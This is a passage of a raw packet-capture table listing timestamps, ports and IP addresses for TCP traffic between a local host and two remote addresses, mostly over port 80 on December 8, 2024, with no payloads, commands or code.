Dec 8, 2024 13:31:49.398976088 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.399036884 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.399054050 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.399107933 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.399806976 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.399879932 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.399935007 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.400662899 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.400747061 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.400861979 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.400916100 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.401487112 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.401541948 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.401546955 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.401587009 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.402585983 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.402643919 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.402681112 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.402720928 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.403198957 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.403264999 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.403310061 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.403362989 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.404103994 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.404169083 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.404211998 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.404253960 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.405024052 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.405051947 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.405090094 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.405112982 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.405797005 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.405860901 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.405976057 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.406025887 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.406636953 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.406728983 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.406785965 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.406811953 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.407474995 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.407546043 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.407591105 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.407638073 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.408328056 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.408392906 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.408400059 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.408441067 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.409152985 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.409190893 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.409219980 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.409240961 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.410058022 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.410131931 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.410309076 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.410409927 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.410933018 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.410962105 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.411003113 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.411020994 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.411768913 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.411828995 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.411850929 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.411875963 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.412578106 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.412638903 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.412693977 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.412798882 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.413413048 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.413465977 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.413532019 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.413680077 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.414321899 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.414387941 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.414443970 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.414490938 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.415165901 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.415203094 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.415246010 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.415273905 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.416022062 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.416068077 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.416099072 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.416115999 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.416863918 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.416932106 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.416961908 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.417006016 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.417692900 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.417757034 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.417927980 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.417994022 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.418535948 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.418596983 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.418646097 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.418680906 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.419383049 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.419459105 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.419461966 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.419558048 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.420223951 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.420267105 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.420350075 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.420392036 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.421072006 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.421114922 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.421148062 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.421189070 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.421931982 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.421996117 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.422071934 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.422111988 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.422821045 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.422880888 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.422924042 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.423033953 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.423618078 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.423666954 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.423707962 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.423804998 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.424515009 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.424555063 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.424583912 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.424626112 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.425331116 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.425375938 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.425462008 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.425551891 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.426179886 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.426269054 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.426307917 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.426420927 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.427035093 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.427083015 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.427139044 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.427222013 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.427917957 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.427948952 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.427973986 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.428009033 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.428766966 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.428824902 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.428869009 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.428909063 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.429949045 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.429991007 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.430327892 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.430910110 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.430959940 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.430973053 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.431015015 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.431379080 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.431428909 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.431488037 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.431555986 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.432147026 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.432199001 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.432245970 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.432394981 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.433000088 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.433058977 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.433093071 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.433260918 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.433867931 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.433921099 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.433954954 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.434046030 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.434737921 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.434803009 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.434848070 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.434891939 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.435586929 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.435637951 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.435642004 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.435678959 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.436450005 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.436501980 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.436547041 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.436629057 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.437236071 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.437285900 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.437333107 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.437475920 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.438114882 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.438214064 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.438222885 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.438277960 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.438982010 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.439035892 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.439059019 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.439101934 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.439798117 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.439840078 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.439898014 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.440013885 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.440676928 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.440752983 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.586905003 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.586980104 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.587109089 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.587277889 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.587332964 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.587471008 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.587562084 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.587939024 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.587985039 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.588016987 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.588219881 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.588776112 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.588818073 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.588895082 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.588932991 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.589627981 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.589699030 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.589732885 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.589776993 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.590572119 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.590621948 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.590672970 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.590747118 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.591480970 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.591571093 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.591614008 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.591757059 CET	443	49840	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:49.591833115 CET	443	49840	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:49.591897011 CET	49840	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:49.592246056 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.592272043 CET	49840	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:49.592286110 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.592297077 CET	443	49840	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:49.592312098 CET	49840	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:49.592319012 CET	443	49840	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:49.592396021 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.592436075 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.593050003 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.593091011 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.593158960 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.593228102 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.593907118 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.593985081 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.594048977 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.594089031 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.594746113 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.594799995 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.594860077 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.595155001 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.595604897 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.595648050 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.595710039 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.595746040 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.596472025 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.596519947 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.596553087 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.596803904 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.597311974 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.597366095 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.597462893 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.597698927 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.598210096 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.598258018 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.598289013 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.598326921 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.599117994 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.599164009 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.599205971 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.599268913 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.599888086 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.599942923 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.600003958 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.600044012 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.600748062 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.600805044 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.600883007 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.600972891 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.601035118 CET	49846	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:49.601068974 CET	443	49846	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:49.601129055 CET	49846	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:49.601632118 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.601680040 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.601730108 CET	49846	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:49.601739883 CET	443	49846	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:49.601749897 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.601789951 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.602524042 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.602641106 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.602658033 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.602670908 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.603445053 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.603492022 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.603492022 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.603529930 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.604327917 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.604377031 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.604408979 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.604491949 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.605319977 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.605366945 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.605400085 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.605442047 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.606287003 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.606338978 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.606447935 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.606494904 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.607168913 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.607213974 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.607268095 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.607400894 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.608000994 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.608019114 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.608051062 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.608062983 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.608815908 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.608864069 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.608930111 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.608989954 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.609536886 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.609662056 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.609666109 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.609703064 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.610245943 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.610284090 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.610387087 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.610424042 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.610915899 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.610934973 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.610961914 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.610975981 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.611778021 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.611887932 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.611946106 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.612740040 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.612787962 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.612812042 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.612849951 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.613528013 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.613576889 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.613651991 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.613689899 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.614329100 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.614428997 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.614476919 CET	49835	80	192.168.2.6	185.215.113.206
